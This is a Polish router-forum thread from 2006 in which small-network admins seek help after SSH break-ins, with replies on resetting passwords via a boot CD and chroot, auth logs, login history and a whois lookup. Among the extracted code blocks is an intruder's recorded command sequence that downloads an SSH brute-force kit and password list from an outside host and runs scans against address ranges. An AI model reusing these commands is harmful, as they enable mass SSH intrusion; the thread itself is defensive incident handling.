Freesco, NND, CDN, EOS :: Wyświetl temat - włamanie na serwer NND prosze o szybką pomoc

: [/] [] ()

cd /
mkdir dysk
mount -t ext3 /dev/hda2 /dysk
chroot /dysk
mc

GeSHi © Codebox Plus

: [/] [] ()

passwd nazwaUzytkownika

GeSHi © Codebox Plus

: [/] [] ()

cd /
mkdir dysk
mount -t ext3 /dev/hda2 /dysk
chroot /dysk
mc

GeSHi © Codebox Plus

: [/] [] ()

Nov 19 18:14:18 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2
Nov 19 18:14:19 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp
Nov 19 18:14:22 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2
Nov 19 18:14:22 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp
Nov 19 18:14:30 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2
Nov 19 18:14:30 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp
Nov 19 18:14:34 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2
Nov 19 18:14:34 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp
Nov 19 18:14:37 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2
Nov 19 18:14:37 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp
Nov 19 18:14:40 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2
Nov 19 18:14:40 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp

GeSHi © Codebox Plus

: [/] [] ()

[jurzikowianka@router ~]$ last
jurzikow pts/0        piekarnia_1      Mon Nov 20 21:04   still logged in
jurzikow pts/0        piekarnia_1      Mon Nov 20 14:58 - 15:52  (00:53)
biuro    pts/0        piekarnia_1      Mon Nov 20 14:32 - 14:58  (00:26)
jurzikow pts/0        piekarnia_1      Mon Nov 20 13:12 - 14:31  (01:18)
jurzikow pts/0        sklep            Mon Nov 20 12:42 - 12:46  (00:03)
admin    pts/0        pool-71-247-232- Sun Nov 19 00:34 - 20:21  (19:47)
jurzikow pts/0        piekarnia_1      Sat Nov 18 18:08 - 18:11  (00:03)
jurzikow pts/0        piekarnia_1      Mon Nov 13 21:06 - 21:38  (00:32)
admin    pts/0        pool-71-247-237- Sun Nov 12 21:43 - 21:48  (00:05)
admin    pts/0        pool-71-247-237- Wed Nov  8 02:01 - 02:02  (00:01)
admin    pts/0        pool-71-247-237- Wed Nov  8 01:45 - 01:46  (00:00)
jurzikow pts/0        piekarnia_1      Tue Nov  7 15:50 - 20:35  (04:45)
reboot   system boot  2.4.32-6nnd      Tue Nov  7 14:17         (13+06:48)
reboot   system boot  2.4.32-6nnd      Tue Nov  7 11:34         (13+09:30)
admin    pts/1        pool-71-247-228- Sun Nov  5 04:47 - 04:54  (00:06)
jurzikow pts/1        piekarnia_1      Thu Nov  2 16:37 - 16:40  (00:02)
jurzikow pts/1        piekarnia_1      Wed Nov  1 19:56 - 20:00  (00:04)
jurzikow pts/1        master           Wed Nov  1 19:13 - 19:29  (00:16)
jurzikow pts/1        master           Wed Nov  1 14:44 - 14:47  (00:03)
jurzikow pts/0        master           Wed Nov  1 01:35 - 01:44  (00:08)

wtmp begins Wed Nov  1 01:35:23 2006
[jurzikowianka@router ~]$

GeSHi © Codebox Plus

: [/] [] ()

83.16.174.118

: [/] [] ()

Nov 19 00:34:17 router sshd[2108]: Accepted password for admin from 71.247.232.28 port 50177 ssh2

: [/] [] ()

cd /tmp
ls
rm -rf *
wget http://71.247.232.28:1831/gsm.gz
tar zxvf gsm.gz 
cd gsm
rm -rf pass_file
wget http://71.247.232.28:1831/aaaa.txt
mv aaaa.txt pass_file
chmod 777 *
clear
./assh 83.16
./assh 212.85 ; ./assh 212.86 ; ./assh 212.8 ; ./assh 24.128 

Autor:	Anonymous [ piątek, 21 kwietnia 2006, 14:22 ]
Tytuł:	włamanie na serwer NND prosze o szybką pomoc
jestem adminem 10 osobowej sieci... obslugiwanej przez server z oprogramowaniem linuxowym NND router jakis ktos pozmienil mi hasla asministracyjne na serwerze!!! w jaki sposób moge namiezyc dowcipnisia i jak moge odzyskac moje hasła!!! podejrzewam ze ktos namieszał w adresach kart po niektórzy nie maja internetu. ludzie siędenerwója a ja zrywam opierdziel... prosze o szybką pomoc ps. dostalem tą sieć w spadku po poprzednim adminie i nie jestem zbyt dobry w te klocki... POMOCY!!!!

Autor:	mund [ piątek, 21 kwietnia 2006, 14:39 ]
Tytuł:
- Odłączyc serwer od sieci, - uruchomić z bootowalnej płyty z linuksem - może byc instalka NND - zalogowac się, : [/] [] () cd / mkdir dysk mount -t ext3 /dev/hda2 /dysk chroot /dysk mc GeSHi © Codebox Plus - przechodzisz do /etc - F4 na pliku shadow - szukasz swojej nazwy użytkownika - kasujesz hasło, jest po pierwszym : po nazwie użytkownika - zapisujesz plik - wyciągasz płytkę - restartujesz serwer - wchodzisz na użytkownika bez podawania hasła : [/] [] () passwd nazwaUzytkownika GeSHi © Codebox Plus - podajesz nowe hasło a dalej ?? zależy co ktoś namieszał, musisz popatrzeć..... Jeżeli się na tym nie znasz to lepiej weź kogoś z doświadczeniem i od nowa postawcie serwer

Autor:	Maciek [ piątek, 21 kwietnia 2006, 14:58 ]
Tytuł:
mund pisze: - Odłączyc serwer od sieci, - uruchomić z bootowalnej płyty z linuksem - może byc instalka NND - zalogowac się, : [/] [] () cd / mkdir dysk mount -t ext3 /dev/hda2 /dysk chroot /dysk mc GeSHi © Codebox Plus Do tego momentu było dobrze. Jednak dalej można prościej. Najpierw samą komendą passwd zmieniamy hasło roota, potem passwd user - hasło usera. Jeśli ktoś się włamał, zapewne było łatwe słownikowe hasło. Nigdy nie robić zbyt łatwych haseł. Skoro był złośliwy i pozmieniał hasła, być może zrobił coś jeszcze. Ja bym zalecał instalkę od nowa.

Autor:	Anonymous [ piątek, 21 kwietnia 2006, 15:08 ]
Tytuł:
dziękuje naprawde bardzo mi pomogliście ale jeszcze jedna sprawa chodzi mi po lowie.. czy jest możliwosc namiezenia włamywacza jestem prawie pewny ze byl to ktos z mijej sieci...

Autor:	MAC!EK [ piątek, 21 kwietnia 2006, 15:18 ]
Tytuł:
Jedyne rozwiązanie to "czysta" instalacja od zera! Możesz skopiować gdzieś cały system i dać komuś te pliki do przejrzenia może znajdzie coś ciekawego co pozwoli namierzyć tego kogoś.

Freesco, NND, CDN, EOS http://forum.freesco.pl/

włamanie na serwer NND prosze o szybką pomoc http://forum.freesco.pl/viewtopic.php?f=22&t=12160	Strona 1 z 2

Autor:	Mis' [ piątek, 21 kwietnia 2006, 15:20 ]
Tytuł:
BZN pisze: czy jest możliwosc namiezenia włamywacza jestem prawie pewny ze byl to ktos z mijej sieci... jeśli nie wiesz jak zmienić hasło, to nie poradzisz sobie z analizą logów. Tym bardziej, że jeśli włamywacz miał minimum wiedzy to w logach raczej nic nie znajdziesz. IMHO, jesli ten serwerek ma dalej działać to lepiej zainstaluj wszystko od nowa... i zrób naprawdę trudne hasła, z małymi i dużymi literami, cyframi i innymi znakami.

Autor:	mund [ sobota, 22 kwietnia 2006, 08:39 ]
Tytuł:
Cytuj: Jednak dalej można prościej. Najpierw samą komendą passwd zmieniamy hasło roota, potem passwd user - hasło usera. Tylko przy zmianie hasła najpierw trzeba podać stare, a jeżeli ktoś zmienił też hasło roota ?? czy w chroot przy zmianie hasła jako starego używamy hasła aktualnego roota ?? czy też starego hasła roota zapisanego w shadow w chroot??

Autor:	Szurik [ sobota, 22 kwietnia 2006, 10:41 ]
Tytuł:
Odpal NND z CD instalacyjnego i zamiast wpisywać install_nnd wpisz: mount /dev/hda1 /mnt chroot /mnt passwd root adduser nazwa użytkownika passwd nazwa użytkownika exit umount /dev/hda1 reboot Uruchom NND normalnie Nie potrzebne jest stare haslo roota rub wedle instrukcji tylko wylacz serwer od internetu !

Autor:	mund [ sobota, 22 kwietnia 2006, 20:59 ]
Tytuł:
Szurik pisze: Odpal NND z CD instalacyjnego i zamiast wpisywać install_nnd wpisz: mount /dev/hda1 /mnt a /dev/hda1 to nie jest przypadkiem partycja boot ?? plik shadow jest w /dev/hda2 przynajmniej podczas standardowej instalacji... i po co ma dodawać nowego użytkownika ?? przecież trzeba zmienić hasła użytkownika z dostępem do konsoli i roota

Autor:	tasiorek [ sobota, 22 kwietnia 2006, 23:44 ]
Tytuł:
mund, Szurik skopiowal uniwersalne rozwiazanie z faq. Dziala w przypadku zmiany hasla na roota i nie zalozenia innego uzytkownika podczas instalacji.

Autor:	mund [ niedziela, 23 kwietnia 2006, 20:19 ]
Tytuł:
OK, nie chciałem się czepiać... BTW tak się zastanawiałem, czy jest możliwe takie ustawienie systemu aby każdy nowo założony użytkownik odpalał się w chroot ?? Bo to by było ciekawe

Autor:	Jurzikowianka [ poniedziałek, 20 listopada 2006, 16:48 ]
Tytuł:
Witam serdecznie!! Mam zwiazany z tematem problem więc podlączam sie , żeby nei zaśmiecać Dzisiaj zadzwonił do mnie gościu (gdzieś z drugiego końca polski) z Sądu Rejonowego , z informacją, że z mojego serwera była próba włamania na ich serwer. No i tam zaczął mnie starszyc ,że jeżeli nie przerwie tego to tam od prokuratowa mi zaczął itd ale nei o tym rzecz... Więc wystraszony patrze na serwer, ale hasło root'a nei zostało złamane (dla pewności odrazu zmieniłem) tylko zauwazyłem że ktoś znalazł hasło dla usera "ADMIN" (na początku załozony nei używany nawet zapomniałem jakie tam było hasło) w katalogu domowym "ADMINA" bardzo dużo dziwnych pliczków nawet *takich, skopiowałem cały katalog "ADMIN"do windowsa (przy okazji nod-32 kilka razy alarmował i przeniósł do kwarantanny) usunąłem "ADMIN" w konsoli. CO musze więcej zrobić, żeby jakoś serwerek przeżył bez ponownej instalki ?? W /var/log/auth sprawdziłem ,że IP na który niby sie włamywałem istnieje ale wg mnie to stamtąd sie ktos włamywał , czy nie tak ?? : [/] [] () Nov 19 18:14:18 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2 Nov 19 18:14:19 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp Nov 19 18:14:22 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2 Nov 19 18:14:22 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp Nov 19 18:14:30 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2 Nov 19 18:14:30 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp Nov 19 18:14:34 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2 Nov 19 18:14:34 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp Nov 19 18:14:37 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2 Nov 19 18:14:37 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp Nov 19 18:14:40 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2 Nov 19 18:14:40 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp GeSHi © Codebox Plus tylko tyle o tym IP znalazłem gdzie jeszcze może być cos zapisane ?? Bardzo proszę o sugestie gdyż mam pierwszy taki przypadek i troszke sie boje a nie mam (za dużo ) wiedzy na ten temat Z góry dziękuje serdecznie pozdrowionka

Autor:	tasiorek [ poniedziałek, 20 listopada 2006, 16:53 ]
Tytuł:
Sum md5 binarek raczej nie masz, wiec ratuje Cie tylko reinstalka NND.

Autor:	MAC!EK [ poniedziałek, 20 listopada 2006, 17:07 ]
Tytuł:
wpisz last i zobaczysz kto się ostatnio logował... zapisz te logi gdzieś na dysk i je zabezpiecz, zdobądź od tego gościa co dzwonił namiar i powiedz że możesz mu udostępnić logi kto się do nich włamał, tzn z jakiego IP czy coś... powinni się odczepić i pomożesz im na pewno znaleźć sprawcę.

Autor:	Maciek [ piątek, 21 kwietnia 2006, 15:19 ]
Tytuł:
Jeśli był cwany skasował logi. Jeśli to typowa małpa z brzytwą, logi być może zostały - sprawdź /var/log/auth (oraz starsze - te z cyferką). Szukaj połączeń ssh i logowania się na roota.

Autor:	Szurik [ poniedziałek, 20 listopada 2006, 22:13 ]
Tytuł:
inetnum: 83.16.174.112 - 83.16.174.119 netname: LUBELSKIECI descr: LUBELSKIE CENTRUM INFORMATYCZNE descr: BILGORAJ descr: POLAND Reverse DNS: ags118.internetdsl.tpnet.pl

Strona 1 z 2	Strefa czasowa UTC+2godz.
Powered by phpBB® Forum Software © phpBB Group https://www.phpbb.com/